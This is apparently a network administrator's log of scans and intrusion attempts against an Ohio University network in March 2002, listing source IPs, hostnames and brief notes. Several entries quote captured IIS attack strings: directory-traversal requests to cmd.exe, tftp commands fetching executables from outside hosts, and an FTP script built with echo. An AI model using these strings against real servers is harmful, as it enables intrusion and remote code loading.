Short summary of some of the attacks against us for Mar. 2002

year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes
2002/03/01-00:25:31.74 211.55.33.54 (korea crap) scannet for port 21
2002/03/01-00:25:32.51 211.55.33.54 (korea crap) scannet for port 21
2002/03/01-05:43:47.79 130.13.158.247 (vdsl-130-13-158-247.phnx.uswest.net) bang on 132.235.3.216:6346 4x/min til 23:30:11.81
2002/03/01-07:46:28.92 213.252.151.4 (BCC GmbH,DE) probe 132.235.3.133:515,25,22
2002/03/01-07:59:15.98 207.218.211.175 (twhou-211-175.ev1.net) (traceroute?) probe 132.235.3.133:3573[0-05]
2002/03/01-08:58:08.91 213.252.151.56 (BCC GmbH,DE) probe 132.235.3.133:80,21
2002/03/01-09:24:54.98 80.14.26.173 (Marseille-103-1-2-173.abo.wanadoo.fr) access hacker ftp daemon..
2002/03/01-10:47:01.78 213.252.151.50 (BCC GmbH,DE) probe 132.235.3.133:110
2002/03/01-11:16:48.21 213.252.151.57 (BCC GmbH,DE) probe 132.235.3.133:3306,21
2002/03/01-11:24:44.24 217.136.135.37 (adsl-67365.turboline.skynet.be) syn scannet for port 21
2002/03/01-11:33:08.04 217.128.85.107 (ALyon-202-1-2-107.abo.wanadoo.fr) attack IIS server w/ tftp+-i+217.128.85.107+get+servudaemon.exe+c:\Inetpub\scripts\servudaemon.exe
2002/03/01-11:42:51.92 132.235.197.131 (hardnoc3.cns.ohiou.edu) scannet for port 161
2002/03/01-11:46:04.90 213.252.151.3 (BCC GmbH,DE) probe 132.235.3.133:515,25
2002/03/01-12:13:59.27 200.177.152.129 (dl-rip-C8B19881.sao.terra.com.br) probe 132.235.3.133 : 6000
2002/03/01-12:13:59.27 213.252.151.44 (BCC GmbH,DE) probe 132.235.3.133:6000
2002/03/01-12:39:19.01 213.252.151.24 (BCC GmbH,DE) probe 132.235.3.133:113,110,3306
2002/03/01-12:51:31.01 132.248.69.23 (ceniza.cenapred.unam.mx) probe 132.235.3.43 : 80
2002/03/01-13:47:25.15 132.235.203.66 (modem-203-066.dialnet.ohiou.edu) try to use ldap to login to net for cob.ohiou.edu net
2002/03/01-14:29:34.30 134.160.21.241 (itblvpn-pool2.riken.go.jp) probe 132.235.3.133:119
2002/03/01-14:29:34.30 213.252.151.54 (BCC GmbH,DE) probe 132.235.3.133:119,110
2002/03/01-14:46:28.65 61.252.53.132 (korea crap) scannet for port 22
2002/03/01-15:12:16.61 213.252.151.44 (BCC GmbH,DE) probe 132.235.3.133:21
2002/03/01-15:47:06.10 217.135.30.22 (modem-1046.articuno.dialup.pol.co.uk) bang on 132.235.19.125:6346 til 15:56:21.80
2002/03/01-15:50:52.16 139.182.163.171 (dns.cbpa.csusb.edu) scannet for port 21
2002/03/01-16:03:49.66 217.135.10.187 (modem-1211.aerodactyl.dialup.pol.co.uk) bang on 132.235.19.125:6346 til 18:01:28.57
2002/03/01-16:29:32.79 198.93.73.9 (QX.net, Inc.,KY,US) scannet for port 21
2002/03/01-16:46:07.17 213.252.151.49 (BCC GmbH,DE) probe 132.235.3.133:79,143
2002/03/01-17:01:25.20 213.252.151.49 (BCC GmbH,DE) probe 132.235.3.133:110,21,119
2002/03/01-17:04:05.41 64.26.175.178 (www.bridgewaterretreat.ca) probe 132.235.3.133:21
2002/03/01-18:23:06.96 148.243.48.158 (MIPROTEC SOLUCIONES SA DE CV, MX) scannet for port 6112
2002/03/01-18:48:56.31 213.252.151.27 (BCC GmbH,DE) probe 132.235.3.133:21
2002/03/01-18:57:35.31 213.252.151.54 (BCC GmbH,DE) probe 132.235.3.133:514,79,110,143
2002/03/01-18:59:52.30 200.175.166.62 (a62-1-2.pmj.gvt.net.br) probe 32.235.3.133 : 79
2002/03/01-19:54:51.73 209.193.31.228 (209-193-31-228-cdsl-rb1.nwc.acsalaska.net) bang on 132.235.19.144 : 6346 til 13:56:00.35
2002/03/01-20:05:59.87 209.47.77.243 (smtp.continuum.org) 1. attack iis server w multiple buff overflow cmds, such as:
2002/03/01-20:05:59.87 209.47.77.243 (smtp.continuum.org) 2. copy+c:\winnt\system32\cmd.exe+c:\temp\cmd2.exe
2002/03/01-20:05:59.87 209.47.77.243 (smtp.continuum.org) 3. cmd.exe?/c+mkdir+c:\temp\VALUEADD\MSFT\GMT\files
2002/03/01-20:10:06.92 213.252.151.37 (BCC GmbH,DE) probe 132.235.3.133:6000
2002/03/01-20:54:59.67 66.75.117.126 (sc-66-75-117-126.socal.rr.com) bang on 132.235.4.26:6346 til 2002/03/02-05:54:55.66 1x/min
2002/03/01-21:52:36.40 137.165.35.202 (jrc-djacobso.williams.edu) probe 132.235.3.133 : 143
2002/03/01-21:52:36.40 213.252.151.31 (BCC GmbH,DE) probe 132.235.3.133:143,3306
2002/03/01-22:30:42.74 213.252.151.50 (BCC GmbH,DE) probe 132.235.3.133:22,514
2002/03/01-22:35:36.08 217.227.53.247 (pD9E335F7.dip.t-dialin.net) scannet for port 80,1433,ping scan of net
2002/03/02-03:59:45.54 217.128.85.107 (ALyon-202-1-2-107.abo.wanadoo.fr) attack iis server w/buff overflow
2002/03/02-05:55:27.13 66.75.117.126 (sc-66-75-117-126.socal.rr.com) bang on 132.235.4.26:6346 all day 1x/min
2002/03/02-06:29:42.20 65.165.168.82 (ONE CLIQ COMMUNICATIONS,IL,US) probe 132.235.3.7 : 6346
2002/03/02-09:22:10.96 198.252.132.227 (Design Automation,CA,US) scannet for port 21
2002/03/02-12:32:02.70 213.65.0.126 (h126n1fls31o826.telia.com) scannet for port 21
2002/03/02-18:45:37.81 66.37.192.43 (Exodus BENGI,CA,US) probe 132.235.3.31 : 3072
2002/03/02-18:45:57.71 66.37.192.43 (Exodus BENGI,CA,US) probe 132.235.3.70 : 1024
2002/03/03-05:21:25.44 193.170.188.243 (aurora.uni-ak.ac.at) join the iis attack party
2002/03/03-05:21:25.44 212.185.238.16 (pD4B9EE10.dip.t-dialin.net) 1. attack IIS server w/ command:
2002/03/03-05:21:25.44 212.185.238.16 (pD4B9EE10.dip.t-dialin.net) 2. copy+c:\winnt\system32\cmd.exe+C:\InetPub\scripts\sensepost.exe%22
2002/03/03-05:21:25.44 212.185.238.16 (pD4B9EE10.dip.t-dialin.net) 3. GET /fdisk.exe?/c+echo+open+131.155.71.104+63666+>+c:\ftp.txt HTTP/1.0
2002/03/03-05:37:24.25 212.168.37.23 (burg.serverdienst.de) scannet for port 21
2002/03/03-05:58:01.15 66.75.117.126 (sc-66-75-117-126.socal.rr.com) bang on 132.235.4.26:6346 all day 1x/min
2002/03/03-06:14:47.09 209.173.195.254 (chateau.cpe.orbis.net) scannet for port 21
2002/03/03-07:54:20.42 4.36.0.5 (mungojerrie.gridcom.net) scannet for port 22
2002/03/03-08:25:45.14 213.25.48.195 (TopNet sp. z o.o. O/Wroclaw,PL) scannet for port 111, statdx exploit
2002/03/03-14:36:49.68 172.130.236.19 (AC82EC13.ipt.aol.com) bang on 132.235.3.246 : 6346 til 16:06:33.73
2002/03/03-15:46:22.93 132.235.19.185 (dhcp-019-185.cns.ohiou.edu) scannet for port 12345
2002/03/03-19:55:59.77 172.156.69.10 (AC9C450A.ipt.aol.com) bang on 132.235.3.246 : 6346 til 21:59:10.70
2002/03/03-22:00:23.26 213.194.65.37 (ender.eecs.uic.edu) scannet for port 22
2002/03/03-22:46:54.64 212.100.183.27 (212-100-183-27.adsl.easynet.be) scannet for port 21
2002/03/04-02:13:41.49 193.251.87.97 (AClermont-Ferrand-101-1-1-97.abo.wanadoo.fr) syn scan of net for prt 80
2002/03/04-03:40:18.67 213.106.204.138 (public1-runc1-4-cust138.manc.broadband.ntl.com) syn scan of net for prt 80
2002/03/04-06:32:26.46 217.120.238.87 (cc198330-a.borne1.ov.nl.home.com) scannet for port 21
2002/03/04-07:19:50.97 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/04-07:41:22.58 217.136.81.16 (adsl-53520.turboline.skynet.be) scannet for port 21, anon ftp attacks
2002/03/04-08:18:32.24 213.51.108.119 (cc26927-b.hnglo1.ov.nl.home.com) scannet for port 21
2002/03/04-13:05:28.61 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524
2002/03/04-13:06:22.11 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 514
2002/03/04-13:13:45.53 217.136.64.233 (adsl-49385.turboline.skynet.be) scannet for port 21
2002/03/04-13:53:04.02 216.168.231.240 (h240.s231.netsol.com) scan several ips for port 33454
2002/03/04-14:33:16.00 132.235.18.150 (ent.ohiou.edu) scannet for port 12345
2002/03/04-16:13:00.20 193.251.87.97 (AClermont-Ferrand-101-1-1-97.abo.wanadoo.fr) attack iis server with tftp command again...
2002/03/04-16:55:48.48 209.209.129.35 (Commonwealth Credit Union,KY,US) scannet for port 21
2002/03/04-20:29:42.68 132.235.177.94 (dhcp-177-094.west-green.ohiou.edu) portscan various ips ports 21,25,80,110,119,6588
2002/03/04-23:23:57.99 132.235.177.94 (dhcp-177-094.west-green.ohiou.edu) scan partial net for port 139
2002/03/04-23:28:12.86 132.235.177.94 (dhcp-177-094.west-green.ohiou.edu) scan net with ping
2002/03/05-00:27:48.60 132.235.177.94 (dhcp-177-094.west-green.ohiou.edu) portscan various ips ports 21,25,80,110,119,6588
2002/03/05-00:33:48.89 132.235.177.94 (dhcp-177-094.west-green.ohiou.edu) scan net for port 137
2002/03/05-01:50:53.09 172.140.33.242 (AC8C21F2.ipt.aol.com) bang on 132.235.3.246 : 6346 til 02:02:56.88
2002/03/05-06:57:30.76 217.128.205.59 (AMontpellier-201-1-4-59.abo.wanadoo.fr) scannet for port 21
2002/03/05-07:13:29.44 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/05-09:04:07.95 193.251.87.97 (AClermont-Ferrand-101-1-1-97.abo.wanadoo.fr) bang on 132.235.16.8 ports 4050, 80
2002/03/05-09:17:06.50 132.235.197.131 (hardnoc3.cns.ohiou.edu) scannet for port 161
2002/03/05-09:57:05.01 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/05-10:57:35.35 217.136.64.233 (adsl-49385.turboline.skynet.be) scannet for port 21, anon ftp attacks
2002/03/05-11:10:14.77 132.235.197.29 (netmgt1.cns.ohiou.edu) scannet on port 161
2002/03/05-13:07:44.18 61.222.93.253 (61-222-93-253.HINET-IP.hinet.net) scannet for port 21
2002/03/05-15:19:45.82 66.28.98.[1-6] (Alexa Internet, CA,US) 1. attack IIS w/ variations of cmds (only run cmd, not copy, no cmds)
2002/03/05-15:19:45.82 66.28.98.[1-6] (Alexa Internet, CA,US) 2. GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
2002/03/05-15:19:45.82 66.28.98.[1-6] (Alexa Internet, CA,US) 3. HTTP header-from them is = From crawler@alexa.com
2002/03/05-15:25:59.79 213.88.204.119 (Infiniteloop AB,SE) scannet for port 21
2002/03/05-15:31:48.61 217.136.66.82 (adsl-49746.turboline.skynet.be) scannet for port 21, anon ftp attacks
2002/03/05-16:38:05.67 132.235.197.29 (netmgt1.cns.ohiou.edu) scannet on port 161
2002/03/05-17:29:48.63 172.175.34.136 (ACAF2288.ipt.aol.com) bang on 132.235.3.246 : 6346 til 18:08:37.57
2002/03/05-19:00:17.40 217.136.162.63 (adsl-74303.turboline.skynet.be) scannet for port 21, anon ftp attacks
2002/03/05-19:49:45.11 80.11.245.121 (APh-Aug-103-1-4-121.abo.wanadoo.fr) scannet for port 21
2002/03/05-19:58:13.30 80.11.245.121 (APh-Aug-103-1-4-121.abo.wanadoo.fr) scannet for port 137
2002/03/05-21:06:33.04 132.235.19.195 (dhcp-019-195.cns.ohiou.edu) scannet for port 12345
2002/03/05-22:14:38.09 66.75.117.126 (sc-66-75-117-126.socal.rr.com) bang on 132.235.4.26 : 6346 til 2002/03/06-05:37:23.45
2002/03/06-00:16:31.22 130.13.158.247 (vdsl-130-13-158-247.phnx.uswest.net) pound on 132.235.3.216 : 6346 til 2002/03/06-05:43:51.12
2002/03/06-00:38:53.74 146.20.33.71 (proxy1.monitor.dal.net-Chodey & Co.,Nj,US) scan 132.235.19.140 ports 8080,3128,80,1080,23,81,81,3128
2002/03/06-03:05:22.32 65.170.112.3 (dns1.matrixstudio.net) scannet with ping, then for port 80 attacks
2002/03/06-05:44:00.09 130.13.158.247 (vdsl-130-13-158-247.phnx.uswest.net) bang on 132.235.3.216 : 6346 til 15:13:21.49
2002/03/06-05:49:14.95 202.98.197.135:22 (mail.gzgov.gov.cn) conn to ports 1024, 3072, others on rand ips
2002/03/06-07:25:05.15 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/06-09:43:34.15 209.51.193.16 (openrelaywatch.org) scannet for port 25
2002/03/06-11:55:08.01 132.235.94.25 (someplace secret@ohiou.edu) scannet for port 139
2002/03/06-14:00:57.04 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/06-14:20:22.64 193.170.188.243 (aurora.uni-ak.ac.at) 1. attack IIS server w/command:
2002/03/06-14:20:22.64 193.170.188.243 (aurora.uni-ak.ac.at) 2. cmd.exe?/c+ping+-v+udp+-n+2000+-l+62000+-w+0+c-889b70d5.012-36-6b73642.cust.bredbandsbolaget.se HTTP/1.0
2002/03/06-16:37:36.30 204.152.186.58 (proxy8.monitor.dal.net-M.I.B.H., LLC,CA,US) probe 132.235.2.114 ports 1080,8080,3128,81,23
2002/03/06-18:01:14.26 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/06-19:23:16.32 66.28.98.[1-6] (Alexa Internet, CA,US) 1. attack IIS w/ variations of cmds (only run cmd, not copy, no cmds)
2002/03/06-19:23:16.32 66.28.98.[1-6] (Alexa Internet, CA,US) 2. GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
2002/03/06-19:23:16.32 66.28.98.[1-6] (Alexa Internet, CA,US) 3. HTTP header-from them is = From crawler@alexa.com
2002/03/06-20:16:54.04 132.235.90.7 (someplace secret@ohiou.edu) scannet for ports 139, 38293
2002/03/06-20:41:23.01 216.190.255.220 (Wasatch Hosting,UT,US) scannet for port 25
2002/03/07-05:18:14.63 218.7.43.253 (Harbin Engineering University 1,CN) attack our ip via port 139 - nimda
2002/03/07-05:50:11.09 66.75.117.126 (sc-66-75-117-126.socal.rr.com) bang on 132.235.4.26 : 6346 til 2002/03/08-05:59:49.43
2002/03/07-05:52:32.55 64.61.25.140 (host4-limewire.colo.ny.np1.net) scan various ips for prt 6346
2002/03/07-06:05:46.98 216.218.208.66 (Geekz Corporation,AU) scan several ips for ports 80,8080
2002/03/07-06:34:30.84 217.81.164.68 (pD951A444.dip.t-dialin.net) scannet for port 21, anon ftp attacks
2002/03/07-06:34:42.35 217.81.164.68 (pD951A444.dip.t-dialin.net) scannet for port 21
2002/03/07-07:07:59.20 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/07-07:50:19.44 66.28.98.[1-6] (Alexa Internet, CA,US) 1. attack IIS w/ variations of cmds (only run cmd, not copy, no cmds)
2002/03/07-07:50:19.44 66.28.98.[1-6] (Alexa Internet, CA,US) 2. GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
2002/03/07-07:50:19.44 66.28.98.[1-6] (Alexa Internet, CA,US) 3. HTTP header-from them is = From crawler@alexa.com
2002/03/07-10:47:44.36 63.125.18.88 (ip-125-18-88.phx.extremezone.com) conn to 132.235.3.143 : 6346
2002/03/07-12:40:17.77 24.208.178.80 (dhcp024-208-178-080.columbus.rr.com) probe ports 512,514 on 2 ips.
2002/03/07-16:12:43.60 172.135.101.35 (AC876523.ipt.aol.com) bang on 132.235.3.246 : 6346 til 17:18:49.55
2002/03/07-16:30:48.03 65.24.131.117 (dhcp065-024-131-117.columbus.rr.com) scan net for port 137
2002/03/07-17:58:46.72 217.136.157.172 (adsl-73132.turboline.skynet.be) scannet for port 21
2002/03/07-20:42:51.51 64.12.180.[,8,9,16,17,18,72] (home-s61.websys.aol.com) probe 132.235.2.114 til 2002/03/07-22:16:52.13
2002/03/07-23:44:24.45 64.12.180.[8,9,16] (home-s62.websys.aol.com) probe 132.235.18.24 til 2002/03/08-04:39:14.18
2002/03/08-02:44:30.04 132.235.238.1 (admin.memaud.ohiou.edu) scannet for port 38293 UDP
2002/03/08-03:13:30.97 195.168.209.150 (gw1.husqvarna.sk) scannet for port 22
2002/03/08-07:40:48.87 204.123.28.43 (crawler3.archive.org) 1. scan port 80 with cmds like:
2002/03/08-07:40:48.87 204.123.28.43 (crawler3.archive.org) 2. GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0
2002/03/08-09:31:35.04 144.134.145.80 (CTPP-p-144-134-145-80.prem.tmns.net.au) scannet for port 25
2002/03/08-13:27:00.80 212.31.250.9 (Colt Hosting Center Pvlan 1,MILAN,IT) scannet for port 80
2002/03/08-13:38:44.35 130.228.230.161 (proxy6.monitor.dal.net-Netcetera,DK) scan ip for port 1080,80.3128,81,,8080,23,8081
2002/03/08-16:10:57.42 80.200.144.123 (80-200-144-123.adsl.powered-by.skynet.be) scannet for port 21
2002/03/08-17:24:12.82 66.28.98.4 (Alexa.com) scan port 80 w/ GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe HTTP/1.0
2002/03/08-21:17:10.23 172.162.6.212 (ACA206D4.ipt.aol.com) bang on 132.235.3.246 : 6346 til 2002/03/09-01:29:40.04
2002/03/08-21:42:46.17 172.168.219.24 (ACA8DB18.ipt.aol.com) bang on 132.235.3.246 : 6346 til 2002/03/08-23:04:35.87
2002/03/08-23:11:37.68 146.115.22.101 (RCN Corporation,NJ,US) scannet for port 1433
2002/03/09-03:13:00.82 193.253.231.145 (ALyon-202-1-1-145.abo.wanadoo.fr) portscan 132.235.17.156 ports 6000,80
2002/03/09-05:05:11.40 163.239.25.89 (eemmi.sogang.ac.kr) scannet for port 21
2002/03/09-05:10:52.46 163.239.25.89 (eemmi.sogang.ac.kr) scan selected ips for port 21
2002/03/09-06:33:54.44 62.29.133.212 (Mobil Only,DE) scannet for port 80
2002/03/09-08:12:15.54 66.28.98.5 (Alexa.com) scan port 80 w/ GET /scripts/..%5c..%5cwinnt/system32/cmd.exe HTTP/1.0
2002/03/09-21:39:45.47 162.83.136.103 (pool-162-83-136-103.ny5030.east.verizon.net) scannet for port 12345
2002/03/09-23:38:54.68 217.82.183.232 (pD952B7E8.dip.t-dialin.net) scannet w/ ping
2002/03/10-01:27:07.81 68.65.96.186 (md-wstmstr-cuda1-c1a-186-a.wmnsmd.adelphia.net) scannet for port 80
2002/03/10-02:06:40.41 211.133.254.6 (6.jln-net.) scannet for port 22
2002/03/10-03:01:57.54 24.50.231.171 (oh-northolmstead4a-171.clvhoh.adelphia.net) scan several ips for port 53,135,1031
2002/03/10-03:03:02.98 24.50.231.171 (oh-northolmstead4a-171.clvhoh.adelphia.net) scannet for port 53,135,1031
2002/03/10-03:55:15.33 218.25.46.136 (CHINANET liaoning province network,CN) portscan 132.235.1.5 139,27374 ,12345
2002/03/10-04:22:08.76 132.208.224.122 (Universite du Quebec a Montreal,CA) scannet for port 21
2002/03/10-07:35:16.04 216.190.255.225 (Wasatch Hosting,UT,US) scannet for port 25,137
2002/03/10-09:24:40.40 80.13.211.246 (ALille-104-1-2-246.abo.wanadoo.fr) scannet for port 1433,139,.137,445
2002/03/10-10:17:08.19 24.50.231.171 (oh-northolmstead4a-171.clvhoh.adelphia.net) scannet with ping
2002/03/10-10:17:13.97 24.50.231.171 (oh-northolmstead4a-171.clvhoh.adelphia.net) scan net for port 5800
2002/03/10-15:55:12.91 216.170.193.77 (hame0pool0-a76.me.tds.net) scannet for port 21
2002/03/10-15:55:22.07 64.230.154.196 (HSE-Kitchener-ppp232809.sympatico.ca) scannet for port 1025
2002/03/10-20:41:49.28 24.27.182.14 (cvg-27-182-14.cinci.rr.com) scannet for port 12345
2002/03/10-21:22:58.81 216.68.29.130 (Fuse Internet Access,OH,US) scannet for port 22
2002/03/10-21:24:37.67 194.204.49.37 (telx-gw.uninet.ee) ssh CRC32 overflow NOOP attacks til 23:08:55.50
2002/03/11-01:58:15.35 193.253.217.68 (AMarseille-201-1-2-68.abo.wanadoo.fr) scannet for port 21
2002/03/11-05:53:24.61 213.149.165.188 (adsl-165-188.cytanet.com.cy) scannet for port 21
2002/03/11-05:56:08.11 213.149.165.188 (adsl-165-188.cytanet.com.cy) scannet for port 21
2002/03/11-07:51:42.27 132.235.197.131 (hardnoc3.cns.ohiou.edu) scannet for port 161 UDP
2002/03/11-08:56:18.05 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/11-11:47:56.22 61.251.164.22 (korea crap) scannet for port 80
2002/03/11-12:43:10.25 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/11-14:08:59.02 217.228.61.245 (D9E43DF5.dip.t-dialin.net) scannet for port 80
2002/03/11-14:09:51.03 217.228.61.245 (pD9E43DF5.dip.t-dialin.net) scannet for port 80
2002/03/11-14:41:41.38 216.110.167.58 (CyberGate, Inc.,FL,US) scannet for port 21
2002/03/11-17:05:34.03 132.235.96.62 (dhcp-096-062.cns.ohiou.edu) scannet for port 139,80
2002/03/12-04:42:53.13 61.177.254.66 (CHINANET Jiangsu province network,CN) scan net for port 80
2002/03/12-05:19:42.23 24.203.32.97 (modemcable097.32-203-24.cap.mc.videotron.ca) scannet for ports 445,139,137
2002/03/12-07:31:44.03 216.190.255.225 (Wasatch Hosting,UT,US) scannet for port 25
2002/03/12-06:27:25.87 132.241.23.238 (lang238-c.dhcp.CSUChico.EDU) 2358 attacks on IIS servers thru 14:29:59.06
2002/03/12-07:11:50.26 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080,3128,80,1080,23
2002/03/12-07:42:24.22 132.235.90.7 (?.ohiou.edu) scannet for port 38293
2002/03/12-08:05:18.47 216.210.223.210 (American States Title,OR,US) scan 132.235.201.2 port 1524, buff overflow attack 6112
2002/03/12-08:39:25.54 216.210.223.210 (American States Title,OR,US) second probe/attack on 216.210.223.210
2002/03/12-08:49:17.11 216.210.223.210 (American States Title,OR,US) scan 132.235.1.252 for port 1524 (ingreslock)
2002/03/12-08:49:17.27 216.210.223.210 (American States Title,OR,US) attack 132.235.1.252:6112 buff overflow - start sh on port 1524
2002/03/12-09:25:05.50 216.210.223.210 (American States Title,OR,US) third probe/attack on 216.210.223.210, + others
2002/03/12-09:34:41.87 216.210.223.210 (American States Title,OR,US) second probe/attack on 132.235.1.252
2002/03/12-10:44:26.39 216.210.223.210 (American States Title,OR,US) third probe/attack on 132.235.1.252
2002/03/12-12:03:25.96 61.75.59.10 (korea crap) scannet for port 21
2002/03/13-02:01:27.94 10.10.51.240 (MAC addr 0:b0:8e:85:3d:50-CNSs router-haha) scan net for port 111
2002/03/13-03:59:26.04 66.28.98.[1-6] (?.alexa.com) 1. start of web scans that include GET commands such as:
2002/03/13-03:59:26.04 66.28.98.[1-6] (?.alexa.com) 2. GET /adsamples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe HTTP/1.0
2002/03/13-03:59:26.04 66.28.98.[1-6] (?.alexa.com) 3. GET /scripts..%c1%9c../winnt/system32/cmd.exe HTTP/1.0
2002/03/13-03:59:26.04 66.28.98.[1-6] (?.alexa.com) 4. GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0
2002/03/13-07:54:43.25 62.226.70.118 (p3EE24676.dip.t-dialin.net) scannet for port 80
2002/03/13-08:07:01.69 62.226.70.118 (p3EE24676.dip.t-dialin.net) scannet for port 80
2002/03/13-12:40:55.56 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scan several ips for port 524
2002/03/13-13:44:00.33 198.234.252.9 (oarnet, somewhere...) try to login to 132.235.1.252:21 69 times
2002/03/13-15:22:02.32 210.95.24.130 (korea crap) scannet for port 21
2002/03/13-18:52:10.96 208.252.19.40 (hotjobs, NY,NY,US) bang on 132.235.1.1 (traceroute?spray?) ports from 33435-33445 til 18:57:27.15
2002/03/13-21:27:54.62 213.93.55.123 (e55123.upc-e.chello.nl) scannet for port 80
2002/03/13-21:37:52.21 198.234.250.151 (oarnet, somewhere...) scannet for port 80
2002/03/14-00:19:45.82 208.210.144.209 (209.144.210.208.pro-ns.net) scan selected ips for port 21
2002/03/14-11:09:44.44 62.4.67.98 (62.4.67.98.not.updated.abovenet.de) scannet several ips for port 1024,3072
2002/03/14-11:11:27.85 217.128.85.160 (ALyon-202-1-2-160.abo.wanadoo.fr) scannet for port 21
2002/03/14-11:15:43.49 62.4.67.75 (62.4.67.75.not.updated.abovenet.de) scannet several ips for port 1024,3072
2002/03/14-13:23:29.08 206.117.136.39 (DSL039.LABridge.com) scannet for port 111 +buff overflow attacks
2002/03/14-13:24:45.52 217.225.17.231 (pD9E111E7.dip.t-dialin.net) scannet for port 119
2002/03/14-13:25:28.07 217.0.63.102 (pD9003F66.dip.t-dialin.net) scannet for port 80
2002/03/14-14:31:53.02 206.228.51.3 (fun1.clmb.edge.net) 1. attack IIS servers w/ buff overflow cmds.
2002/03/14-14:31:53.02 206.228.51.3 (fun1.clmb.edge.net) 2. ftp to 136.142.118.119 user GRAVE to get Serv-U32.exe
2002/03/14-21:22:19.98 61.171.94.140 (CHINANET Shanghai province network) scan net for ports 8080,80,1080,3128,8000
2002/03/14-21:42:53.28 61.177.253.22 (CHINANET Jiangsu province network) 1. attack IIS servers w/ buff overflow cmds.
2002/03/14-21:42:53.28 61.177.253.22 (CHINANET Jiangsu province network) 2. tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20c:\Admin.dll
2002/03/14-21:54:24.91 61.177.246.149 (CHINANET Jiangsu province network) 1. attack IIS servers w/ buff overflow cmds.
2002/03/14-21:54:24.91 61.177.246.149 (CHINANET Jiangsu province network) 2. tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20c:\Admin.dll
2002/03/14-22:40:15.49 24.161.35.102 (cm-24-161-35-102.nycap.rr.com) scannet for port 27374
2002/03/14-22:46:14.13 217.82.224.110 (pD952E06E.dip.t-dialin.net) scannet for port 21
2002/03/14-23:22:10.46 61.177.246.223 (CHINANET Jiangsu province network) 1. attack IIS servers w/ buff overflow cmds.
2002/03/14-23:22:10.46 61.177.246.223 (CHINANET Jiangsu province network) 2. tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20c:\Admin.dll
2002/03/14-23:41:05.45 66.130.72.141 (modemcable141.72-130-66.sherb.mc.videotron.ca) scannet for port 21
2002/03/15-01:06:22.56 61.177.253.209 (CHINANET Jiangsu province network) 1. attack IIS servers w/ buff overflow cmds.
2002/03/15-01:06:22.56 61.177.253.209 (CHINANET Jiangsu province network) 2. tftp%20-i%20132.235.80.92%20GET%20Admin.dll%20c:\Admin.dll
2002/03/15-03:40:35.70 212.179.239.73 (bzq-239-73.red.bezeqint.net) scannet with ping
2002/03/15-13:48:40.00 172.181.249.142 () scannet for port 21
2002/03/15-14:44:32.87 207.239.248.92 () probe net w/ icmp address mask request
2002/03/15-15:06:49.71 207.239.248.92 () probe net for port 1080,8080
2002/03/15-15:08:00.24 207.239.248.92 () scannet for port 3128 (squid?)
2002/03/15-15:31:42.24 207.239.248.92 () probe samba client access on several ips
2002/03/15-15:50:12.72 207.239.248.92 () probe port 111 - portmap list
2002/03/15-16:12:12.00 172.181.213.27 () scannet for port 21
2002/03/15-18:49:05.65 207.239.248.92 () probe net w/ icmp timestamp request
2002/03/16-03:43:57.89 218.50.3.26 () statdx attack
2002/03/16-11:40:25.79 161.58.176.4 () scannet for ports (445,139,137)
2002/03/16-21:02:38.00 198.187.135.15 () scannet for port 21
2002/03/16-21:03:21.00 198.234.250.151 () scannet for port 21
2002/03/17-07:43:43.15 212.179.238.83 () scannet for port 1433, anon ftp attacks
2002/03/17-09:07:21.46 172.180.124.18 () scannet for port 21
2002/03/17-10:20:33.54 216.30.34.112 () scannet for port 21
2002/03/17-16:00:15.79 161.58.176.4 () scannet for ports (445,139,137)
2002/03/17-20:04:23.64 12.236.44.178 () scannet for port 21
2002/03/17-23:30:07.59 209.1.6.4 () 1. attack IIS servers w/ buff overflow cmds.
2002/03/17-23:30:07.59 209.1.6.4 () 2. tftp.exe/?+-i+209.1.6.4+GET+2.tmp+c:/recycler/_/_tmp/2
2002/03/18-02:22:11.42 61.120.44.20 () scannet for port 21
2002/03/18-10:40:46.75 216.56.20.215 () scannet for port 21
2002/03/18-12:12:58.83 62.163.86.119 (a86119.upc-a.chello.nl) scannet for port 21
2002/03/18-13:49:39.03 66.45.30.103 () scannet with ping
2002/03/18-14:24:24.36 211.177.141.29 () scannet for port 21
2002/03/18-16:11:47.08 64.157.1.30 () scannet for port 21
2002/03/18-20:16:33.65 155.230.152.166 () scannet for port 21
2002/03/18-23:53:36.04 61.10.25.110 () scannet for port 21
2002/03/19-06:43:20.67 24.164.248.46 () scannet for ports 3128,8080
2002/03/19-13:05:58.89 80.133.105.180 () scannet for port 21
2002/03/19-13:54:40.31 62.4.67.145 () scannet for ports 1024, 2072
2002/03/19-14:55:11.97 207.71.92.221 () portscan 132.235.18.248 - 139,443,445,5000,21,23,25,79,80,110,113,135,143
2002/03/19-16:41:10.11 62.4.67.179 () scannet for ports 1024, 2072
